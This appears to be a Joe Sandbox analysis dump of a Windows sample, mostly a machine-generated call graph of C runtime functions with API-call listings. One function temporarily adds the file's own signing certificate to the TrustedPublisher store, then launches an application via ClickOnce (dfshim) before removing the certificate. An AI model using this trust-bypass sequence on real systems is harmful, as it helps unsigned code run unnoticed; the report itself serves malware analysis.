5541 91572a LeaveCriticalSection 5526->5541 5527->5466 5527->5474 5527->5478 5530 9144a8 _abort 15 API calls 5529->5530 5531 9146d8 5530->5531 5536 9146e6 _ValidateLocalCookies 5531->5536 5537 91474d IsProcessorFeaturePresent 5531->5537 5533 91473c 5534 9146c2 _abort 21 API calls 5533->5534 5535 914749 5534->5535 5535->5519 5536->5519 5538 914758 5537->5538 5539 914573 _abort 3 API calls 5538->5539 5540 91476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5527 5542->5248 5546 91572a LeaveCriticalSection 5543->5546 5545 9152e1 5545->5248 5546->5545 5548 913f8f 5547->5548 5549 913f85 5547->5549 5548->5549 5550 914424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 913fb0 5550->5551 5555 9172d1 5551->5555 5556 9172e4 5555->5556 5557 913fc9 5555->5557 5556->5557 5563 916754 5556->5563 5559 9172fe 5557->5559 5560 917311 5559->5560 5561 917326 5559->5561 5560->5561 5562 915249 __fassign 33 API calls 5560->5562 5561->5549 5562->5561 5564 916760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 914424 _abort 33 API calls 5564->5565 5566 916769 5565->5566 5570 9167b7 _abort 5566->5570 5575 9156e2 EnterCriticalSection 5566->5575 5568 916787 5576 9167cb 5568->5576 5570->5557 5574 913f24 _abort 33 API calls 5574->5570 5575->5568 5577 9167d9 __fassign 5576->5577 5579 91679b 5576->5579 5578 916507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 9167ba 5579->5580 5583 91572a LeaveCriticalSection 5580->5583 5582 9167ae 5582->5570 5582->5574 5583->5582 5585 914fd0 5584->5585 5591 91507a _ValidateLocalCookies 5584->5591 5592 91634d 5585->5592 5587 915031 5604 917cd1 5587->5604 5590 917cd1 38 API calls 5590->5591 5591->5269 5593 913f72 __fassign 33 API calls 5592->5593 5594 91636d MultiByteToWideChar 5593->5594 5596 9163ab 5594->5596 5602 916443 _ValidateLocalCookies 5594->5602 5597 9163cc _abort __alloca_probe_16 5596->5597 5599 9162ff 16 API calls 5596->5599 5598 91643d 5597->5598 5601 916411 MultiByteToWideChar 5597->5601 5609 91646a 
5598->5609 5599->5597 5601->5598 5603 91642d GetStringTypeW 5601->5603 5602->5587 5603->5598 5605 913f72 __fassign 33 API calls 5604->5605 5606 917ce4 5605->5606 5613 917ab4 5606->5613 5608 915052 5608->5590 5610 916476 5609->5610 5611 916487 5609->5611 5610->5611 5612 914869 _free 15 API calls 5610->5612 5611->5602 5612->5611 5614 917acf 5613->5614 5615 917af5 MultiByteToWideChar 5614->5615 5616 917ca9 _ValidateLocalCookies 5615->5616 5617 917b1f 5615->5617 5616->5608 5618 9162ff 16 API calls 5617->5618 5621 917b40 __alloca_probe_16 5617->5621 5618->5621 5619 917bf5 5624 91646a __freea 15 API calls 5619->5624 5620 917b89 MultiByteToWideChar 5620->5619 5622 917ba2 5620->5622 5621->5619 5621->5620 5638 915a15 5622->5638 5624->5616 5625 917bb9 5625->5619 5626 917c04 5625->5626 5627 917bcc 5625->5627 5628 9162ff 16 API calls 5626->5628 5632 917c25 __alloca_probe_16 5626->5632 5627->5619 5630 915a15 6 API calls 5627->5630 5628->5632 5629 917c9a 5631 91646a __freea 15 API calls 5629->5631 5630->5619 5631->5619 5632->5629 5633 915a15 6 API calls 5632->5633 5634 917c79 5633->5634 5634->5629 5635 917c88 WideCharToMultiByte 5634->5635 5635->5629 5636 917cc8 5635->5636 5637 91646a __freea 15 API calls 5636->5637 5637->5619 5639 915741 _abort 5 API calls 5638->5639 5640 915a3c 5639->5640 5643 915a45 _ValidateLocalCookies 5640->5643 5644 915a9d 5640->5644 5642 915a85 LCMapStringW 5642->5643 5643->5625 5645 915741 _abort 5 API calls 5644->5645 5646 915ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 914d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 9156e2 EnterCriticalSection 5648->5655 5650 914d67 5656 914dbc 5650->5656 5654 914d80 _abort 5654->5283 5655->5650 5668 9154dc 5656->5668 5658 914e0a 5659 9154dc 21 API calls 5658->5659 5660 914e26 5659->5660 5661 9154dc 21 API calls 5660->5661 5662 914e44 5661->5662 5663 914d74 5662->5663 5664 914869 _free 15 API calls 5662->5664 5665 914d88 5663->5665 5664->5663 5682 91572a LeaveCriticalSection 5665->5682 5667 
914d92 5667->5654 5669 9154ed 5668->5669 5678 9154e9 5668->5678 5670 9154f4 5669->5670 5671 915507 _abort 5669->5671 5672 9147f9 _free 15 API calls 5670->5672 5675 915535 5671->5675 5676 91553e 5671->5676 5671->5678 5673 9154f9 5672->5673 5674 91473d _abort 21 API calls 5673->5674 5674->5678 5677 9147f9 _free 15 API calls 5675->5677 5676->5678 5680 9147f9 _free 15 API calls 5676->5680 5679 91553a 5677->5679 5678->5658 5681 91473d _abort 21 API calls 5679->5681 5680->5679 5681->5678 5682->5667 5684 913f72 __fassign 33 API calls 5683->5684 5685 915571 5684->5685 5685->5074 5687 91356a _abort 5686->5687 5688 913582 5687->5688 5701 9136b8 GetModuleHandleW 5687->5701 5708 9156e2 EnterCriticalSection 5688->5708 5695 91358a 5697 9135ff _abort 5695->5697 5709 913c97 5695->5709 5696 913671 _abort 5696->5107 5712 913668 5697->5712 5702 913576 5701->5702 5702->5688 5703 9136fc GetModuleHandleExW 5702->5703 5704 913726 GetProcAddress 5703->5704 5705 91373b 5703->5705 5704->5705 5706 913758 _ValidateLocalCookies 5705->5706 5707 91374f FreeLibrary 5705->5707 5706->5688 5707->5706 5708->5695 5723 9139d0 5709->5723 5743 91572a LeaveCriticalSection 5712->5743 5714 913641 5714->5696 5715 913677 5714->5715 5744 915b1f 5715->5744 5717 913681 5718 9136a5 5717->5718 5719 913685 GetPEB 5717->5719 5721 9136fc _abort 3 API calls 5718->5721 5719->5718 5720 913695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9136ad ExitProcess 5721->5722 5726 91397f 5723->5726 5725 9139f4 5725->5697 5727 91398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 9156e2 EnterCriticalSection 5727->5734 5729 913999 5735 913a20 5729->5735 5731 9139a6 5739 9139c4 5731->5739 5733 9139b7 _abort 5733->5725 5734->5729 5736 913a48 5735->5736 5738 913a40 _ValidateLocalCookies 5735->5738 5737 914869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 91572a LeaveCriticalSection 5739->5742 5741 9139ce 5741->5733 5742->5741 5743->5714 5745 915b44 5744->5745 5747 915b3a 
_ValidateLocalCookies 5744->5747 5746 915741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6747 91324d 6748 91522b 46 API calls 6747->6748 6749 91325f 6748->6749 6758 91561e GetEnvironmentStringsW 6749->6758 6752 91326a 6754 914869 _free 15 API calls 6752->6754 6755 91329f 6754->6755 6756 913275 6757 914869 _free 15 API calls 6756->6757 6757->6752 6759 915635 6758->6759 6769 915688 6758->6769 6760 91563b WideCharToMultiByte 6759->6760 6763 915657 6760->6763 6760->6769 6761 915691 FreeEnvironmentStringsW 6762 913264 6761->6762 6762->6752 6770 9132a5 6762->6770 6764 9162ff 16 API calls 6763->6764 6765 91565d 6764->6765 6766 91567a 6765->6766 6767 915664 WideCharToMultiByte 6765->6767 6768 914869 _free 15 API calls 6766->6768 6767->6766 6768->6769 6769->6761 6769->6762 6771 9132ba 6770->6771 6772 91480c _abort 15 API calls 6771->6772 6781 9132e1 6772->6781 6773 914869 _free 15 API calls 6774 91335f 6773->6774 6774->6756 6775 91480c _abort 15 API calls 6775->6781 6776 913347 6778 913376 15 API calls 6776->6778 6779 91334d 6778->6779 6782 914869 _free 15 API calls 6779->6782 6780 913369 6783 91474d _abort 6 API calls 6780->6783 6781->6775 6781->6776 6781->6780 6784 914869 _free 15 API calls 6781->6784 6785 913345 6781->6785 6787 913eca 6781->6787 6782->6785 6786 913375 6783->6786 6784->6781 6785->6773 6788 913ed7 6787->6788 6789 913ee5 6787->6789 6788->6789 6794 913efc 6788->6794 6790 9147f9 _free 15 API calls 6789->6790 6791 913eed 6790->6791 6792 91473d _abort 21 API calls 6791->6792 6793 913ef7 6792->6793 6793->6781 6794->6793 6795 9147f9 _free 15 API calls 6794->6795 6795->6791 5804 913d8f 5805 913d9e 5804->5805 5809 913db2 5804->5809 5807 914869 _free 15 API calls 5805->5807 5805->5809 5806 914869 _free 15 API calls 5808 913dc4 5806->5808 5807->5809 5810 914869 _free 15 API calls 5808->5810 5809->5806 5811 913dd7 5810->5811 5812 914869 _free 15 API calls 5811->5812 5813 913de8 5812->5813 5814 914869 _free 15 API calls 5813->5814 5815 913df9 5814->5815 6475 
91430f 6476 91431a 6475->6476 6480 91432a 6475->6480 6481 914330 6476->6481 6479 914869 _free 15 API calls 6479->6480 6482 914343 6481->6482 6483 914349 6481->6483 6484 914869 _free 15 API calls 6482->6484 6485 914869 _free 15 API calls 6483->6485 6484->6483 6486 914355 6485->6486 6487 914869 _free 15 API calls 6486->6487 6488 914360 6487->6488 6489 914869 _free 15 API calls 6488->6489 6490 91436b 6489->6490 6491 914869 _free 15 API calls 6490->6491 6492 914376 6491->6492 6493 914869 _free 15 API calls 6492->6493 6494 914381 6493->6494 6495 914869 _free 15 API calls 6494->6495 6496 91438c 6495->6496 6497 914869 _free 15 API calls 6496->6497 6498 914397 6497->6498 6499 914869 _free 15 API calls 6498->6499 6500 9143a2 6499->6500 6501 914869 _free 15 API calls 6500->6501 6502 9143b0 6501->6502 6507 9141f6 6502->6507 6513 914102 6507->6513 6509 91421a 6510 914246 6509->6510 6526 914163 6510->6526 6512 91426a 6512->6479 6514 91410e ___scrt_is_nonwritable_in_current_image 6513->6514 6521 9156e2 EnterCriticalSection 6514->6521 6516 914142 6522 914157 6516->6522 6518 914118 6518->6516 6520 914869 _free 15 API calls 6518->6520 6519 91414f _abort 6519->6509 6520->6516 6521->6518 6525 91572a LeaveCriticalSection 6522->6525 6524 914161 6524->6519 6525->6524 6527 91416f ___scrt_is_nonwritable_in_current_image 6526->6527 6534 9156e2 EnterCriticalSection 6527->6534 6529 914179 6530 9143d9 _abort 15 API calls 6529->6530 6531 91418c 6530->6531 6535 9141a2 6531->6535 6533 91419a _abort 6533->6512 6534->6529 6538 91572a LeaveCriticalSection 6535->6538 6537 9141ac 6537->6533 6538->6537 6041 9155ce GetCommandLineA GetCommandLineW 6042 918df1 6043 918e15 6042->6043 6044 918e2e 6043->6044 6046 919beb __startOneArgErrorHandling 6043->6046 6045 918e78 6044->6045 6050 9199d3 6044->6050 6049 919c2d __startOneArgErrorHandling 6046->6049 6058 91a1c4 6046->6058 6051 9199f0 DecodePointer 6050->6051 6054 919a00 6050->6054 6051->6054 6052 919a8d 6053 919a82 _ValidateLocalCookies 6052->6053 6055 
9147f9 _free 15 API calls 6052->6055 6053->6045 6054->6052 6054->6053 6056 919a37 6054->6056 6055->6053 6056->6053 6057 9147f9 _free 15 API calls 6056->6057 6057->6053 6059 91a1fd __startOneArgErrorHandling 6058->6059 6060 91a495 __raise_exc RaiseException 6059->6060 6061 91a224 __startOneArgErrorHandling 6059->6061 6060->6061 6062 91a267 6061->6062 6063 91a242 6061->6063 6064 91a786 __startOneArgErrorHandling 15 API calls 6062->6064 6067 91a7b5 6063->6067 6066 91a262 __startOneArgErrorHandling _ValidateLocalCookies 6064->6066 6066->6049 6068 91a7c4 6067->6068 6069 91a838 __startOneArgErrorHandling 6068->6069 6071 91a7e3 __startOneArgErrorHandling 6068->6071 6070 91a786 __startOneArgErrorHandling 15 API calls 6069->6070 6072 91a831 6070->6072 6071->6072 6073 91a786 __startOneArgErrorHandling 15 API calls 6071->6073 6072->6066 6073->6072 6796 917570 6797 9175a9 6796->6797 6798 9147f9 _free 15 API calls 6797->6798 6802 9175d5 _ValidateLocalCookies 6797->6802 6799 9175b2 6798->6799 6800 91473d _abort 21 API calls 6799->6800 6801 9175bd _ValidateLocalCookies 6800->6801 5816 913eb5 5817 913eb8 5816->5817 5818 913f24 _abort 33 API calls 5817->5818 5819 913ec4 5818->5819 6074 911ff4 6077 912042 6074->6077 6078 911fff 6077->6078 6079 91204b 6077->6079 6079->6078 6080 9123c3 43 API calls 6079->6080 6081 912086 6080->6081 6082 9123c3 43 API calls 6081->6082 6083 912091 6082->6083 6084 913e89 33 API calls 6083->6084 6085 912099 6084->6085 5820 911ab8 5821 911aef 5820->5821 5822 911aca 5820->5822 5822->5821 5829 91209a 5822->5829 5841 9123c3 5829->5841 5832 9120a3 5833 9123c3 43 API calls 5832->5833 5834 911b06 5833->5834 5835 913e89 5834->5835 5836 913e95 _abort 5835->5836 5837 914424 _abort 33 API calls 5836->5837 5840 913e9a 5837->5840 5838 913f24 _abort 33 API calls 5839 913ec4 5838->5839 5840->5838 5855 9123d1 5841->5855 5843 911afc 5843->5832 5844 9123c8 5844->5843 5845 916b14 _abort 2 API calls 5844->5845 5846 913f29 5845->5846 5847 913f35 5846->5847 5850 916b6f _abort 
33 API calls 5846->5850 5848 913f5c 5847->5848 5849 913f3e IsProcessorFeaturePresent 5847->5849 5852 913793 _abort 23 API calls 5848->5852 5851 913f49 5849->5851 5850->5847 5853 914573 _abort 3 API calls 5851->5853 5854 913f66 5852->5854 5853->5848 5856 9123da 5855->5856 5857 9123dd GetLastError 5855->5857 5856->5844 5867 9126a4 5857->5867 5860 912457 SetLastError 5860->5844 5861 9126df ___vcrt_FlsSetValue 6 API calls 5862 91240b 5861->5862 5863 9126df ___vcrt_FlsSetValue 6 API calls 5862->5863 5865 912433 5862->5865 5866 912411 5862->5866 5863->5865 5864 9126df ___vcrt_FlsSetValue 6 API calls 5864->5866 5865->5864 5865->5866 5866->5860 5868 912543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5867->5868 5869 9126be 5868->5869 5870 9126d6 TlsGetValue 5869->5870 5871 9123f2 5869->5871 5870->5871 5871->5860 5871->5861 5871->5866 5872 9148bb 5873 9148cb 5872->5873 5878 9148e1 5872->5878 5874 9147f9 _free 15 API calls 5873->5874 5875 9148d0 5874->5875 5876 91473d _abort 21 API calls 5875->5876 5887 9148da 5876->5887 5877 91494b 5902 9131ec 5877->5902 5878->5877 5883 914a2c 5878->5883 5891 914a4b 5878->5891 5881 9149b9 5882 914869 _free 15 API calls 5881->5882 5882->5883 5917 914c65 5883->5917 5884 9149b0 5884->5881 5888 914a3e 5884->5888 5908 9179bb 5884->5908 5889 91474d _abort 6 API calls 5888->5889 5890 914a4a 5889->5890 5892 914a57 5891->5892 5892->5892 5893 91480c _abort 15 API calls 5892->5893 5894 914a85 5893->5894 5895 9179bb 21 API calls 5894->5895 5896 914ab1 5895->5896 5897 91474d _abort 6 API calls 5896->5897 5898 914ae0 _abort 5897->5898 5899 914b81 FindFirstFileExA 5898->5899 5900 914bd0 5899->5900 5901 914a4b 21 API calls 5900->5901 5903 913201 5902->5903 5904 9131fd 5902->5904 5903->5904 5905 91480c _abort 15 API calls 5903->5905 5904->5884 5906 91322f 5905->5906 5907 914869 _free 15 API calls 5906->5907 5907->5904 5911 91790a 5908->5911 5909 91791f 5910 917924 5909->5910 5912 9147f9 _free 15 API calls 5909->5912 5910->5884 5911->5909 5911->5910 5915 
91795b 5911->5915 5913 91794a 5912->5913 5914 91473d _abort 21 API calls 5913->5914 5914->5910 5915->5910 5916 9147f9 _free 15 API calls 5915->5916 5916->5913 5918 914c6f 5917->5918 5919 914c7f 5918->5919 5921 914869 _free 15 API calls 5918->5921 5920 914869 _free 15 API calls 5919->5920 5922 914c86 5920->5922 5921->5918 5922->5887 5923 9114bb IsProcessorFeaturePresent 5924 9114d0 5923->5924 5927 911493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5924->5927 5926 9115b3 5927->5926 6086 9112fb 6091 911aac SetUnhandledExceptionFilter 6086->6091 6088 911300 6092 9138f9 6088->6092 6090 91130b 6091->6088 6093 913905 6092->6093 6094 91391f 6092->6094 6093->6094 6095 9147f9 _free 15 API calls 6093->6095 6094->6090 6096 91390f 6095->6096 6097 91473d _abort 21 API calls 6096->6097 6098 91391a 6097->6098 6098->6090 6539 91383f 6540 91384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 913882 _abort 6540->6541 6547 9156e2 EnterCriticalSection 6540->6547 6543 91385f 6544 9167cb __fassign 15 API calls 6543->6544 6545 91386f 6544->6545 6548 913888 6545->6548 6547->6543 6551 91572a LeaveCriticalSection 6548->6551 6550 91388f 6550->6541 6551->6550 5928 9156a1 5929 9156ac 5928->5929 5931 9156d5 5929->5931 5933 9156d1 5929->5933 5934 9159b3 5929->5934 5939 9156f9 5931->5939 5935 915741 _abort 5 API calls 5934->5935 5936 9159da 5935->5936 5937 9159e3 _ValidateLocalCookies 5936->5937 5938 9159f8 InitializeCriticalSectionAndSpinCount 5936->5938 5937->5929 5938->5937 5940 915725 5939->5940 5941 915706 5939->5941 5940->5933 5942 915710 DeleteCriticalSection 5941->5942 5942->5940 5942->5942 6099 918ce1 6100 918d01 6099->6100 6103 918d38 6100->6103 6102 918d2b 6104 918d3f 6103->6104 6105 918da0 6104->6105 6106 918d5f 6104->6106 6107 919997 16 API calls 6105->6107 6108 91988e 6105->6108 6106->6108 6110 919997 16 API calls 6106->6110 6109 918dee 6107->6109 6108->6102 6109->6102 6111 9198be 6110->6111 6111->6102 6803 919160 6806 91917e 
6803->6806 6805 919176 6807 919183 6806->6807 6808 9199d3 16 API calls 6807->6808 6809 919218 6807->6809 6810 9193af 6808->6810 6809->6805 6810->6805 6112 9133e5 6113 9133f7 6112->6113 6114 9133fd 6112->6114 6116 913376 6113->6116 6117 913383 6116->6117 6118 9133a0 6116->6118 6119 91339a 6117->6119 6120 914869 _free 15 API calls 6117->6120 6118->6114 6121 914869 _free 15 API calls 6119->6121 6120->6117 6121->6118 5943 915ba6 5944 915bb1 5943->5944 5946 915bd7 5943->5946 5945 915bc1 FreeLibrary 5944->5945 5944->5946 5945->5944 6552 916026 6555 91602b 6552->6555 6554 91604e 6555->6554 6556 915c56 6555->6556 6557 915c63 6556->6557 6558 915c85 6556->6558 6559 915c71 DeleteCriticalSection 6557->6559 6560 915c7f 6557->6560 6558->6555 6559->6559 6559->6560 6561 914869 _free 15 API calls 6560->6561 6561->6558 6122 919beb 6123 919c04 __startOneArgErrorHandling 6122->6123 6124 919c2d __startOneArgErrorHandling 6123->6124 6125 91a1c4 16 API calls 6123->6125 6125->6124 6562 91452d 6570 915858 6562->6570 6564 914537 6565 9144a8 _abort 15 API calls 6564->6565 6569 914541 6564->6569 6566 914549 6565->6566 6567 914556 6566->6567 6575 914559 6566->6575 6571 915741 _abort 5 API calls 6570->6571 6572 91587f 6571->6572 6573 915897 TlsAlloc 6572->6573 6574 915888 _ValidateLocalCookies 6572->6574 6573->6574 6574->6564 6576 914569 6575->6576 6577 914563 6575->6577 6576->6569 6579 9158ae 6577->6579 6580 915741 _abort 5 API calls 6579->6580 6581 9158d5 6580->6581 6582 9158e1 _ValidateLocalCookies 6581->6582 6583 9158ed TlsFree 6581->6583 6582->6576 6583->6582 6584 91142e 6587 912cf0 6584->6587 6586 91143f 6588 9144a8 _abort 15 API calls 6587->6588 6589 912d07 _ValidateLocalCookies 6588->6589 6589->6586

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000104), ref: 00911016
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00911025
                                                                                                                                                                                                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00911032
                                                                                                                                                                                                                                                        • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00911057
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00040000), ref: 00911063
                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00911082
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009110B2
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?), ref: 009110C5
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00002000), ref: 009110F4
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0091110A
                                                                                                                                                                                                                                                        • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0091111A
                                                                                                                                                                                                                                                        • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0091112D
                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00911134
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0091113E
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0091115D
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0091116E
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00911182
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00911198
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009111A9
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(dfshim), ref: 009111BA
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009111C6
                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00009C40), ref: 009111E8
                                                                                                                                                                                                                                                        • CertDeleteCertificateFromStore.CRYPT32(?), ref: 0091120B
                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(?,00000000), ref: 0091121A
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00911223
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00911228
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0091122D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                        • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                        • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0091192B
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 009119F7
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00911A10
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00911A1A
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0091466B
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00914675
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00914682
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000,?,00913F66,00000003,0091209F,00911AFC), ref: 00913698
                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000,?,00913F66,00000003,0091209F,00911AFC), ref: 0091369F
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 009136B1
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0091A490,?,?,00000008,?,?,0091A130,00000000), ref: 0091A6C2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                        • Opcode ID: 29226b113068e6736462cf0f2f9e9d343b76d573ae4b21b866bf9a9ef50a8402
                                                                                                                                                                                                                                                        • Instruction ID: a6fbb5fb42e6c0b72eeaa85ed3a29583381be60baffadb82d69e4a9f7123bea5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29226b113068e6736462cf0f2f9e9d343b76d573ae4b21b866bf9a9ef50a8402
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2B15C716116089FD715CF28C48ABA47BE1FF45364F298658E89ACF2E1C339DE92CB41
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00911BEA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                        • Opcode ID: d4aaba6516bbd130366d6fcc3948309cb9f3dae1417ce1b9686478af5b395e7d
                                                                                                                                                                                                                                                        • Instruction ID: 0343ef135e0cf9a19cea7416154b5bdd8df13d4a876d0da66f6a5bb3a42b7a03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4aaba6516bbd130366d6fcc3948309cb9f3dae1417ce1b9686478af5b395e7d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92519071E642099FDB28CF64E8817EEBBF8FB58340F148029C501EB294D3749991DF90
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00911300), ref: 00911AB1
                                                                                                                                                                                                                                                        Memory Dump Source
